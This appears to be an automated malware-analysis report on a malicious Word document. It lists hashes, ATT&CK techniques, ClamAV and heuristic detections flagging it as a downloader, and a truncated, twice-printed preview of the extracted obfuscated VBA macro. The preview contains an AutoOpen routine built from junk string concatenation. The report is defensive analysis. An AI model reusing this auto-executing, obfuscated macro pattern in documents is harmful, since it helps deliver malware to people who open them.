Office (OLE) malware analysis — malicious · 92c4cd0e6a3c4430

MALICIOUS

Office (OLE)

195.0 KB Created: 2018-09-25 10:45:00 Authoring application: Microsoft Office Word First seen: 2019-03-10

MD5: 08d102ae21fba4346b541569d13b648f SHA-1: cbcb954715a2360751904267813ce3f72404c9d7 SHA-256: 92c4cd0e6a3c4430cff511cd92a87bc7e0c398fb5fd38e661ed4cfe37477c941

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and uses the Shell() function, indicating an attempt to execute external code. The ClamAV heuristic also flags it as a downloader. The presence of the AutoOpen macro and Shell() call strongly suggests the intent is to download and execute a second-stage payload, likely delivered as a spearphishing attachment.

Heuristics 6

ClamAV: Doc.Downloader.00536d-6698374-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.00536d-6698374-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 198796 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	198796 bytes
SHA-256: `6953747a869c96d1611b8ea642bb355f5d4f0ba2224f0db886dd448c223a20dd`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "dnMpabRzY" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim EEicLL(1) EEicLL(0) = Right(wsBBN + KphHmipDLGEOowjE + WLqNC, 851) + Mid(UwKjmzm + XPZObREGBiDDSFodqu + iHiMwY, 589, 208) + Mid(FLoTruul + qRiRjdjJJHuuHtEIhX + NzHUj, 270, 879) + MidB(mjiNd + wvzBSiHuYjBqdzLQUYft + ZCLEPh, 585, 564) Dim fNXGG(2) fNXGG(0) = Left(DKwidTRI + CmbSjGwSlmuXaLZtj + zNMDi, 136) + Mid(ktkmii + wHKInLInYZsOjlp + FfYGJv, 7, 871) + Left(wbiDcmZ + wBDQJhOsfDBouRiDwr + wCczUE, 301) + Mid(FQoNB + YXhINGHjFCLEWzjFNhkS + DwwYFPA, 53, 388) fNXGG(1) = MidB(KrErTVR + EXlYjdvAhoFYfmiapB + rFWHfOt, 238, 367) + Left(YjLXp + EBnqWlMhhmqYBvnMhwhGU + RGdzO, 870) + Left(wGwBj + lhMacfFdRFdinXuSUFQhTs + Eoqsia, 737) + Mid(uusWL + hIPbQZLjPQpUztKBoCZWCw + AXbwIb, 618, 14) Dim pwuqW(1) pwuqW(0) = MidB(hbNurE + WsOmIEMrRQaOzIkivQk + wEnvi, 873, 264) + Mid(OZCvK + CkDYGjjSYpHHmIGp + sizEDX, 988, 465) Dim mapnf(1) mapnf(0) = MidB(aLissbN + BMvHQBisjvSfrFRnCKXl + FioWhbwz, 703, 600) + Right(PvkvDvz + vTYUaJFUibRTKPLFwUuMn + VCGHc, 733) + Left(KPQBGR + QAqQwlRFjtwzAHkiXwNCoiwz + NFnXbi, 225) + Right(FkkBSs + ZJHfWiduCwBiNfaiGbV + oFSCmwuJ, 936) Dim lLjHH(1) lLjHH(0) = Left(IWHiT + RPuFmVQYvjKRqYBiaDtKz + IwsWo, 806) + MidB(YsbViFu + lawWTkVipGjYFaMSuCGqK + faHrYj, 90, 122) + MidB(KpoNXr + swzmjEsbDkimBEuXQQ + ShWokXE, 441, 215) + Mid(SnStujmj + VtoYDJcUOjRShjTUXj + uTwjL, 17, 760) Dim QazbVB(2) QazbVB(0) = MidB(ziGFbST + lCtjKCPTjTppOSMSQCmtS + DqiQLWt, 877, 515) + Mid(IGYjHoUl + PntQvjowIawZoRVwv + zTDRtjvw, 491, 625) + MidB(oClzQV + cMSqcKSXzoppZMdHCt + unFKWDR, 100, 528) + Right(LlAMoTWc + roJMMLmNHLbdXCnPGtND + EZApnj, 313) QazbVB(1) = MidB(CzwzJ + SNdfkHcRDiNUlnzImmw + vBVVDaS, 580, 458) + Left(zariwwp + zCGbYNJAErWnBjjGqlEp + iKvSM, 819) + Left(pdtutw + SdTlELIvJojiMOWtDNho + zzYqotKQ, 466) + MidB(WGASmnW + NqqjjWDmEloFNASGP + JjSpIV, 511, 321) Dim AmUDt(2) AmUDt(0) = Right(fSUwQKjJ + juvOfbDJmdXjNoSbC + VGjlO, 371) + Right(KzjSEPAz + tzjMTHzSCWROYYoitJI + bjnuQQ, 253) AmUDt(1) = Mid(MJtXJmYf + kRtQvfrMRbjOknULj + hUUfVAOB, 191, 275) + Left(fDiPs + YAXUHXJYzETfjZwPjfdL + KiEKCX, 538) + Left(coKzMILr + FuOGkITdGFvHwsFwV + zhXGYZj, 134) + Left(nJBSwYTq + wPsjwrQPGsUadjdvikWj + jOoAU, 715) Dim WdwniP(2) WdwniP(0) = Mid(vuqMGAV + kATLjTwpFEEwbjkzlRbTlkcm + nSczXQnK, 474, 802) + Left(woKcfwSK + GhwVIhbEhOwGFaLtaaF + TnIIEfT, 458) + MidB(MvACIGd + ckAhYAaHRBjADUXYWZ + haahEYCn, 934, 560) + MidB(BTGkI + MGPzLoAniEbLPGzTVwE + DjBKi, 281, 751) WdwniP(1) = Right(RAjSbPpQ + ErBImHznpIJKviqdRY + juOKAiid, 100) + MidB(ZMBXPDhO + iHtGHjkmFqJCSOXUELDj + wtGbZ, 707, 192) tXEVcoNjozLQc (KeyString(vLtjjLBN + cJDGm + 3 + 9 + 6 + 2 + 47 + ntoUk + FGUDM) + MfvLO + FwEcHMQ + KeyString(zQWrkMEZ + jaaqw + 3 + 10 + 7 + 2 + 55 + sQdIuXph + ksdqtkMX) + UiEZljFKzGi + GYrNLf + bufOcwjtVGa + awXuEAt + rGQfFU + ISHlZQo + ARcnK + ZajraDhon + kwYalIoo + vbbtnzFd + NkcKY + aVTjoMLmji + HHfah + diorHd + rQuSiX) Dim Snaqh(1) Snaqh(0) = Mid(nNMJls + WOSjuAOomiEZDfaUpcGtdM + HjBnTF, 604, 97) + Right(icCDw + DJukhQKYEOPUkiHHlw + twaTPzRm, 575) + Mid(aCPhZulc + RpkSKUvrCFrLASBMHS + fPQUBiNA, 434, 328) + MidB(IpBEFzq + jirPvSjPnhhsFXTNdCjaM + RRwHKcz, 632, 926) Dim pqvLS(2) pqvLS(0) = MidB(bYSjDQv + sCANtrVASfTWpSlfuLQEA + TpwiCv, 902, 185) + Left(XIVzViK + MEiUqliQZczAKfYVQjYNP + JQiZhF, 85) + Right(IkUGtXfU + iXwpYpJpOoqSDXbBrXtzTW + OcsEE, 557) + Left(wLaJkXQ + CRSRjSIzsZoZiSvNrKkOA + QoYRTHZ, 165) pqvLS(1) = MidB(WufJk + ksuWhHZcDdiSwHBUZB + PRMOOi, 312, 60) + Right(wdHZE + wKrEvizEzXIPLaiEUtL + AWbTa, 205) Dim TYVcOa(1) TYVcOa(0) = Left(vNjKqqj + TcaHIVSrHiCmrnvpWnZYJ + hkmSX, 866) + Left(muIZK + NWSwcWBPDuouDRjGnh + kllbEn, 741) + Right(mTZCGLw + jXOczVsrrsElziMrh + doKGZP, 830) + MidB(iOdwF + lNFMwWjWwoFXwtWtaS + GBtlJqmW, 615, 740) Dim FFPmQ(2) FFPmQ(0) = MidB(QvPkwLh + JNAIfqSKnIcFJWUSN ... (truncated)

SHA-256: 6953747a869c96d1611b8ea642bb355f5d4f0ba2224f0db886dd448c223a20dd

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "dnMpabRzY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim EEicLL(1)
EEicLL(0) = Right(wsBBN + KphHmipDLGEOowjE + WLqNC, 851) + Mid(UwKjmzm + XPZObREGBiDDSFodqu + iHiMwY, 589, 208) + Mid(FLoTruul + qRiRjdjJJHuuHtEIhX + NzHUj, 270, 879) + MidB(mjiNd + wvzBSiHuYjBqdzLQUYft + ZCLEPh, 585, 564)
   Dim fNXGG(2)
fNXGG(0) = Left(DKwidTRI + CmbSjGwSlmuXaLZtj + zNMDi, 136) + Mid(ktkmii + wHKInLInYZsOjlp + FfYGJv, 7, 871) + Left(wbiDcmZ + wBDQJhOsfDBouRiDwr + wCczUE, 301) + Mid(FQoNB + YXhINGHjFCLEWzjFNhkS + DwwYFPA, 53, 388)
fNXGG(1) = MidB(KrErTVR + EXlYjdvAhoFYfmiapB + rFWHfOt, 238, 367) + Left(YjLXp + EBnqWlMhhmqYBvnMhwhGU + RGdzO, 870) + Left(wGwBj + lhMacfFdRFdinXuSUFQhTs + Eoqsia, 737) + Mid(uusWL + hIPbQZLjPQpUztKBoCZWCw + AXbwIb, 618, 14)
   Dim pwuqW(1)
pwuqW(0) = MidB(hbNurE + WsOmIEMrRQaOzIkivQk + wEnvi, 873, 264) + Mid(OZCvK + CkDYGjjSYpHHmIGp + sizEDX, 988, 465)
   Dim mapnf(1)
mapnf(0) = MidB(aLissbN + BMvHQBisjvSfrFRnCKXl + FioWhbwz, 703, 600) + Right(PvkvDvz + vTYUaJFUibRTKPLFwUuMn + VCGHc, 733) + Left(KPQBGR + QAqQwlRFjtwzAHkiXwNCoiwz + NFnXbi, 225) + Right(FkkBSs + ZJHfWiduCwBiNfaiGbV + oFSCmwuJ, 936)
   Dim lLjHH(1)
lLjHH(0) = Left(IWHiT + RPuFmVQYvjKRqYBiaDtKz + IwsWo, 806) + MidB(YsbViFu + lawWTkVipGjYFaMSuCGqK + faHrYj, 90, 122) + MidB(KpoNXr + swzmjEsbDkimBEuXQQ + ShWokXE, 441, 215) + Mid(SnStujmj + VtoYDJcUOjRShjTUXj + uTwjL, 17, 760)
   Dim QazbVB(2)
QazbVB(0) = MidB(ziGFbST + lCtjKCPTjTppOSMSQCmtS + DqiQLWt, 877, 515) + Mid(IGYjHoUl + PntQvjowIawZoRVwv + zTDRtjvw, 491, 625) + MidB(oClzQV + cMSqcKSXzoppZMdHCt + unFKWDR, 100, 528) + Right(LlAMoTWc + roJMMLmNHLbdXCnPGtND + EZApnj, 313)
QazbVB(1) = MidB(CzwzJ + SNdfkHcRDiNUlnzImmw + vBVVDaS, 580, 458) + Left(zariwwp + zCGbYNJAErWnBjjGqlEp + iKvSM, 819) + Left(pdtutw + SdTlELIvJojiMOWtDNho + zzYqotKQ, 466) + MidB(WGASmnW + NqqjjWDmEloFNASGP + JjSpIV, 511, 321)
   Dim AmUDt(2)
AmUDt(0) = Right(fSUwQKjJ + juvOfbDJmdXjNoSbC + VGjlO, 371) + Right(KzjSEPAz + tzjMTHzSCWROYYoitJI + bjnuQQ, 253)
AmUDt(1) = Mid(MJtXJmYf + kRtQvfrMRbjOknULj + hUUfVAOB, 191, 275) + Left(fDiPs + YAXUHXJYzETfjZwPjfdL + KiEKCX, 538) + Left(coKzMILr + FuOGkITdGFvHwsFwV + zhXGYZj, 134) + Left(nJBSwYTq + wPsjwrQPGsUadjdvikWj + jOoAU, 715)
   Dim WdwniP(2)
WdwniP(0) = Mid(vuqMGAV + kATLjTwpFEEwbjkzlRbTlkcm + nSczXQnK, 474, 802) + Left(woKcfwSK + GhwVIhbEhOwGFaLtaaF + TnIIEfT, 458) + MidB(MvACIGd + ckAhYAaHRBjADUXYWZ + haahEYCn, 934, 560) + MidB(BTGkI + MGPzLoAniEbLPGzTVwE + DjBKi, 281, 751)
WdwniP(1) = Right(RAjSbPpQ + ErBImHznpIJKviqdRY + juOKAiid, 100) + MidB(ZMBXPDhO + iHtGHjkmFqJCSOXUELDj + wtGbZ, 707, 192)
tXEVcoNjozLQc (KeyString(vLtjjLBN + cJDGm + 3 + 9 + 6 + 2 + 47 + ntoUk + FGUDM) + MfvLO + FwEcHMQ + KeyString(zQWrkMEZ + jaaqw + 3 + 10 + 7 + 2 + 55 + sQdIuXph + ksdqtkMX) + UiEZljFKzGi + GYrNLf + bufOcwjtVGa + awXuEAt + rGQfFU + ISHlZQo + ARcnK + ZajraDhon + kwYalIoo + vbbtnzFd + NkcKY + aVTjoMLmji + HHfah + diorHd + rQuSiX)
   Dim Snaqh(1)
Snaqh(0) = Mid(nNMJls + WOSjuAOomiEZDfaUpcGtdM + HjBnTF, 604, 97) + Right(icCDw + DJukhQKYEOPUkiHHlw + twaTPzRm, 575) + Mid(aCPhZulc + RpkSKUvrCFrLASBMHS + fPQUBiNA, 434, 328) + MidB(IpBEFzq + jirPvSjPnhhsFXTNdCjaM + RRwHKcz, 632, 926)
   Dim pqvLS(2)
pqvLS(0) = MidB(bYSjDQv + sCANtrVASfTWpSlfuLQEA + TpwiCv, 902, 185) + Left(XIVzViK + MEiUqliQZczAKfYVQjYNP + JQiZhF, 85) + Right(IkUGtXfU + iXwpYpJpOoqSDXbBrXtzTW + OcsEE, 557) + Left(wLaJkXQ + CRSRjSIzsZoZiSvNrKkOA + QoYRTHZ, 165)
pqvLS(1) = MidB(WufJk + ksuWhHZcDdiSwHBUZB + PRMOOi, 312, 60) + Right(wdHZE + wKrEvizEzXIPLaiEUtL + AWbTa, 205)
   Dim TYVcOa(1)
TYVcOa(0) = Left(vNjKqqj + TcaHIVSrHiCmrnvpWnZYJ + hkmSX, 866) + Left(muIZK + NWSwcWBPDuouDRjGnh + kllbEn, 741) + Right(mTZCGLw + jXOczVsrrsElziMrh + doKGZP, 830) + MidB(iOdwF + lNFMwWjWwoFXwtWtaS + GBtlJqmW, 615, 740)
   Dim FFPmQ(2)
FFPmQ(0) = MidB(QvPkwLh + JNAIfqSKnIcFJWUSN 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.